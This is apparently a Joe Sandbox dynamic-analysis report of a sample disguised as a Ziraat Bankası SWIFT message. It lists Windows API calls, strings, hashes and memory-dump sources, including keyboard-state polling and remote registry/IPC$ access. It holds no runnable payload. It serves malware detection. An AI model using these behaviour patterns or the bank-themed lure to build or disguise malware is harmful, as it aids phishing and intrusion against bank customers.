                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                        • String ID: (
                                                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                                                        • Opcode ID: 5e0307ab2e68f6c8322a3e764936732ca791371f91262eb86b179c99e2e957a0
                                                                                                                                                        • Instruction ID: 46c5400fae92ac0a6930f9ecf281901678a467b04dc02c5a56e1d09fce38a49b
                                                                                                                                                        • Opcode Fuzzy Hash: 5e0307ab2e68f6c8322a3e764936732ca791371f91262eb86b179c99e2e957a0
                                                                                                                                                        • Instruction Fuzzy Hash: CF512B75900309AFCB14CFA8D885EAEBBB9EF48710F14851EF99997350D771A941CB60
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                        • API String ID: 2889450990-2391861430
                                                                                                                                                        • Opcode ID: 516735db13d398392c440401c9fea175a95274f825947f6c3318ee75bdc82c59
                                                                                                                                                        • Instruction ID: 4dfa30844631e4d6d99461afdec54776d616ba90535cdd288445709d9482147f
                                                                                                                                                        • Opcode Fuzzy Hash: 516735db13d398392c440401c9fea175a95274f825947f6c3318ee75bdc82c59
                                                                                                                                                        • Instruction Fuzzy Hash: E2515A31800609BADF15FBE0CD46EEEB7B8BF05344F10016AF505721A2EB316E99DB61
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                        • API String ID: 2889450990-3420473620
                                                                                                                                                        • Opcode ID: baa1aacddd199245252d3137608b94aaaef822d64e366b6f9cf2f621184595f4
                                                                                                                                                        • Instruction ID: 9efd34c8967ce46392335639a795a73a4be224bf4ee36731cb194f72f56799f1
                                                                                                                                                        • Opcode Fuzzy Hash: baa1aacddd199245252d3137608b94aaaef822d64e366b6f9cf2f621184595f4
                                                                                                                                                        • Instruction Fuzzy Hash: E7515931900609AADF15FBE0DD46EEEB7B8BF05344F10006AF509721A2EB716E99DB61
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 000C55D7
                                                                                                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 000C5664
                                                                                                                                                        • GetMenuItemCount.USER32(00141708), ref: 000C56ED
                                                                                                                                                        • DeleteMenu.USER32(00141708,00000005,00000000,000000F5,?,?), ref: 000C577D
                                                                                                                                                        • DeleteMenu.USER32(00141708,00000004,00000000), ref: 000C5785
                                                                                                                                                        • DeleteMenu.USER32(00141708,00000006,00000000), ref: 000C578D
                                                                                                                                                        • DeleteMenu.USER32(00141708,00000003,00000000), ref: 000C5795
                                                                                                                                                        • GetMenuItemCount.USER32(00141708), ref: 000C579D
                                                                                                                                                        • SetMenuItemInfoW.USER32(00141708,00000004,00000000,00000030), ref: 000C57D3
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 000C57DD
                                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 000C57E6
                                                                                                                                                        • TrackPopupMenuEx.USER32(00141708,00000000,?,00000000,00000000,00000000), ref: 000C57F9
                                                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000C5805
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3993528054-0
                                                                                                                                                        • Opcode ID: 5034b5a392461b404ea4ed8b4561c0351880abb6749e93d4ed0c33ec887cb823
                                                                                                                                                        • Instruction ID: 0e23c5b721755a052185740476819edf104cf861ba58a4134f47283449a81dcf
                                                                                                                                                        • Opcode Fuzzy Hash: 5034b5a392461b404ea4ed8b4561c0351880abb6749e93d4ed0c33ec887cb823
                                                                                                                                                        • Instruction Fuzzy Hash: B971E478640A15BFEB209B54DC49FAEBFA5FF00369F240209F514AB1E1C7B16C90DB91
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0008E959
                                                                                                                                                        • timeGetTime.WINMM ref: 0008EBFA
                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 000F543A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeekSleepTimetime
                                                                                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                                        • API String ID: 1792118007-758534266
                                                                                                                                                        • Opcode ID: 96771a4f619d9f4d513b2454b935df1d07bfaa01b1e9f9a334a1bea9f2b9d0dc
                                                                                                                                                        • Instruction ID: 29b75ff84ef18d8b9ecfaa367de5bf0f8f2c7b0ce65fe8ebcc0aaa8f9ffa9427
                                                                                                                                                        • Opcode Fuzzy Hash: 96771a4f619d9f4d513b2454b935df1d07bfaa01b1e9f9a334a1bea9f2b9d0dc
                                                                                                                                                        • Instruction Fuzzy Hash: DAF1F7705083C49FEB65EF64C845BAA77E4BF45304F18096DF9C58B6A2D7B0E884CB52
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 000BA1DC
                                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000BA211
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000BA22D
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000BA249
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000BA273
                                                                                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 000BA29B
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000BA2A6
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000BA2AB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                        • API String ID: 1687751970-22481851
                                                                                                                                                        • Opcode ID: 32c879196cb0662405374688ebb9eb3d2f54368ed7a99549c7d412db4286c1ed
                                                                                                                                                        • Instruction ID: ee65695a089d61722ce35d647e25ff3ab657713f5ace5b130efa9cd534f6599e
                                                                                                                                                        • Opcode Fuzzy Hash: 32c879196cb0662405374688ebb9eb3d2f54368ed7a99549c7d412db4286c1ed
                                                                                                                                                        • Instruction Fuzzy Hash: 7A41F676D10229ABDF21EBA4EC85DEEB7B8BF04300F00456AF845B31A1EB719E45CB50
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,000F30A8,?,?,#include depth exceeded. Make sure there are no recursive includes,?,?,?,?,?,0008419E), ref: 000C25D6
                                                                                                                                                        • LoadStringW.USER32(00000000,?,?,000F30A8), ref: 000C25DD
                                                                                                                                                        • _wprintf.LIBCMT ref: 000C2610
                                                                                                                                                        • __swprintf.LIBCMT ref: 000C2632
                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000C26A1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                        • API String ID: 1080873982-4153970271
                                                                                                                                                        • Opcode ID: 90cd9e2abb1076509a7f50e5ff0f2f0be95b78daa3e88f88867d108e7a462970
                                                                                                                                                        • Instruction ID: c13932b8aa71850d9f10d1c25aedd2469d9db1aab7ecd085f73bac86cb60b52b
                                                                                                                                                        • Opcode Fuzzy Hash: 90cd9e2abb1076509a7f50e5ff0f2f0be95b78daa3e88f88867d108e7a462970
                                                                                                                                                        • Instruction Fuzzy Hash: D2212A3180021AAFDF12BB90CC4AFEE7B79BF19304F044469F555660A3EB71A668DB61
                                                                                                                                                        APIs
                                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 000C7B42
                                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 000C7B58
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000C7B69
                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 000C7B7B
                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 000C7B8C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: SendString
                                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                        • API String ID: 890592661-1007645807
                                                                                                                                                        • Opcode ID: 7066c48ffab6979ef6b92c8639721bb8081b0d3196f1eb8fe9fbdfbd407c234c
                                                                                                                                                        • Instruction ID: 31507964e54fa51d1d62b8a9726764c412056a71a046010458fe240cafd80682
                                                                                                                                                        • Opcode Fuzzy Hash: 7066c48ffab6979ef6b92c8639721bb8081b0d3196f1eb8fe9fbdfbd407c234c
                                                                                                                                                        • Instruction Fuzzy Hash: 4E11C4A164025979D720B3A1CC4AEFF7EBCFBD1B10F0004297465A60C2EF701E48CAB1
                                                                                                                                                        APIs
                                                                                                                                                        • timeGetTime.WINMM ref: 000C7794
                                                                                                                                                          • Part of subcall function 0009DC38: timeGetTime.WINMM(?,75A4B400,000F58AB), ref: 0009DC3C
                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 000C77C0
                                                                                                                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 000C77E4
                                                                                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 000C7806
                                                                                                                                                        • SetActiveWindow.USER32 ref: 000C7825
                                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 000C7833
                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 000C7852
                                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 000C785D
                                                                                                                                                        • IsWindow.USER32 ref: 000C7869
                                                                                                                                                        • EndDialog.USER32(00000000), ref: 000C787A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                        • String ID: BUTTON
                                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                                        • Opcode ID: 3163ac02c65bedf1bc79d32dba860b8d60d75907abe9f6233f77e3e015172d41
                                                                                                                                                        • Instruction ID: a5fb6574f62b8722afdff4cc1cb1caa00a3702bcd392178fe30ce477f23d9400
                                                                                                                                                        • Opcode Fuzzy Hash: 3163ac02c65bedf1bc79d32dba860b8d60d75907abe9f6233f77e3e015172d41
                                                                                                                                                        • Instruction Fuzzy Hash: 5D216FB4248209AFE7115FA0EC89F2A7F79FB45349F400128F569829B2DFB15D84DE21
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
                                                                                                                                                          • Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 000D034B
                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 000D03DE
                                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 000D03F2
                                                                                                                                                        • CoCreateInstance.OLE32(0010DA8C,00000000,00000001,00133CF8,?), ref: 000D043E
                                                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 000D04AD
                                                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 000D0505
                                                                                                                                                        • _memset.LIBCMT ref: 000D0542
                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 000D057E
                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 000D05A1
                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 000D05A8
                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 000D05DF
                                                                                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 000D05E1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1246142700-0
                                                                                                                                                        • Opcode ID: 3a45e3907ad78d0edf18a9d7ff047d6d2ddfdb5345f64bcea6ce7fee4b012708
                                                                                                                                                        • Instruction ID: 23182f05ae6cbc6206b04b8f9bf476e0b29ac7352cddaf0124cc0a4de68e64dc
                                                                                                                                                        • Opcode Fuzzy Hash: 3a45e3907ad78d0edf18a9d7ff047d6d2ddfdb5345f64bcea6ce7fee4b012708
                                                                                                                                                        • Instruction Fuzzy Hash: 74B1CC75A00209AFDB04DFA4D889EAEBBB9FF48314F148459F949EB251D770ED41CB60
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 000C2ED6
                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 000C2F41
                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 000C2F61
                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 000C2F78
                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 000C2FA7
                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 000C2FB8
                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 000C2FE4
                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 000C2FF2
                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 000C301B
                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 000C3029
                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 000C3052
                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 000C3060
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                        • Opcode ID: 1dfe2d5d74410adbe017170eeb976b26ba5cbc76957025055bd3c153938894dd
                                                                                                                                                        • Instruction ID: d222f25a6a731c1141f05e04457e253d0b7939a3a5c8f61c23119162f511fc5e
                                                                                                                                                        • Opcode Fuzzy Hash: 1dfe2d5d74410adbe017170eeb976b26ba5cbc76957025055bd3c153938894dd
                                                                                                                                                        • Instruction Fuzzy Hash: 0951E721A0478829FB75EBB48811FEEBFF45F11340F08859DD5C2565C3DA949B8CCBA2
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 000BED1E
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 000BED30
                                                                                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 000BED8E
                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 000BED99
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 000BEDAB
                                                                                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 000BEE01
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 000BEE0F
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 000BEE20
                                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 000BEE63
                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 000BEE71
                                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000BEE8E
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 000BEE9B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                                        • Opcode ID: be05483d284d69738618470231895f4e160a59584e6382824fe146e5a326859e
                                                                                                                                                        • Instruction ID: eb822706c771fda05c8d53910a44d2be3aa16abd404547272301c28df29a9aa4
                                                                                                                                                        • Opcode Fuzzy Hash: be05483d284d69738618470231895f4e160a59584e6382824fe146e5a326859e
                                                                                                                                                        • Instruction Fuzzy Hash: 6A510FB1B00205AFDB18CFA9DD85AAEBBFAFB88700F148129F519D7291D7B1DD408B10
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0009B759,?,00000000,?,?,?,?,0009B72B,00000000,?), ref: 0009BA58
                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0009B72B), ref: 0009B7F6
                                                                                                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0009B72B,00000000,?,?,0009B2EF,?,?), ref: 0009B88D
                                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 000FD8A6
                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B72B,00000000,?,?,0009B2EF,?,?), ref: 000FD8D7
                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B72B,00000000,?,?,0009B2EF,?,?), ref: 000FD8EE
                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B72B,00000000,?,?,0009B2EF,?,?), ref: 000FD90A
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 000FD91C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
